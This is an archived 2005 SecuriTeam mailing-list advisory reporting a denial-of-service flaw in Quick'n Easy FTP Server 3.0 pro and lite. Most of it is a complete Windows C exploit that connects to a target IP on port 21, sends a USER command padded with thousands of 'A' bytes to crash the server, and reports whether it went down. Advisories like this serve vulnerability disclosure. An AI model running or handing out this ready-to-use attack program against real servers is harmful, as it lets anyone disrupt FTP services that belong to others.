[EXPL] Quick'n Easy FTP Server DoS (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/07/05
- Previous message: SecuriTeam: "[NT] CA BrightStor ARCserve Backup Agent For MS SQL Server Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 7 Aug 2005 18:26:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Quick'n Easy FTP Server DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
"
<http://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html>
Quick 'n Easy FTP Server is a multi threaded FTP server for Windows
98/NT/XP that can be easily setup even by inexperienced users. New users
can be easily created by a wizard which is guiding you step by step in the
process."
Quick'n Easy FTP Server is vulnerable to a denial of service whenever a
long string is passed with USER command.
DETAILS
Vulnerable Systems:
* Quick'n Easy FTP Server version 3.0 pro
* Quick'n Easy FTP Server version 3.0 lite
Exploit:
/*********************************
Quick'n Easy FTP Server 3.0 (pro and lite) Remote D.o.S Exploit by Kozan
( Based on matiteman's code in perl )
Application: Quick 'n Easy FTP Server 3.0 (pro and lite)
Vendor: www.pablosoftwaresolutions.com
Discovered by: matiteman
Exploit Coded by: Kozan
Credits to ATmaCA, matiteman
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com
*********************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32.lib")
char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41";
int main(int argc, char *argv[])
{
fprintf(stdout, "Quick'n Easy FTP Server 3.0 (pro and lite) Remote
D.o.S Exploit by Kozan\n");
fprintf(stdout, "Discovered by: matiteman\n");
fprintf(stdout, "Exploit Coded by: Kozan\n");
fprintf(stdout, "Credits to ATmaCA, matiteman\n\n");
fprintf(stdout, "www.spyinstructors.com -
kozan@spyinstructors.com\n");
if(argc<2)
{
fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
return -1;
}
WSADATA wsaData;
SOCKET sock;
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(21);
addr.sin_addr.s_addr = inet_addr(argv[1]);
memset(&(addr.sin_zero), '\0', 8);
fprintf(stdout, "Connecting to %s ...\n", argv[1]);
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr)
) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Connected.\n");
char *pszBuf1 = (char *)malloc(sizeof(Buff)+10);
wsprintf(pszBuf1, "USER %s\r\n", Buff);
fprintf(stdout, "Sending B.o.F USER command ...\n");
if( send(sock,pszBuf1,strlen(pszBuf1),0) == -1 )
{
fprintf(stderr, "Could not sent!\n");
closesocket(sock);
return -1;
}
fprintf(stdout, "String sent...\n");
Sleep(500);
fprintf(stdout, "Please wait, checking if the server crashed or
not...\n");
if( send(sock,pszBuf1,strlen(pszBuf1),0) == -1 )
{
fprintf(stdout, "Server Crashed!!!\n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Server is still alive. Maybe it is not vulnerable
or allready patched!\n");
closesocket(sock);
WSACleanup();
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:kozan@spyinstructors.com>
Kozan.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] CA BrightStor ARCserve Backup Agent For MS SQL Server Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] Quick n Easy FTP Server Buffer Overflow (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Quick 'n Easy FTP Server
is a multi threaded FTP server for Windows ... A buffer overlow vulnerability exists in
Quick 'n Easy FTP Server. ... In no event shall we be liable for any damages whatsoever
including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [EXPL] TinyWeb Server DoS Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The information in this
bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be
liable for any damages whatsoever including direct, indirect, incidental, consequential, loss
of business profits or special damages. ... (Securiteam) - [UNIX] SquirrelMail Cross Site Scripting in Encoded Text
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... SquirrelMail has
all the functionality you would want from an email ... In no event shall we be liable for any
damages whatsoever including direct, indirect, incidental, consequential, loss of business profits
or special damages. ... (Securiteam) - [EXPL] VLC Media Player DoS (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... VLC Media Player DoS
... In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [NEWS] WzdFTPD hash DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WzdFTPD project
also supports bandwidth limitation (per user, per group, ... In no event shall we be liable for
any damages whatsoever including direct, indirect, incidental, consequential, loss of business
profits or special damages. ... (Securiteam)
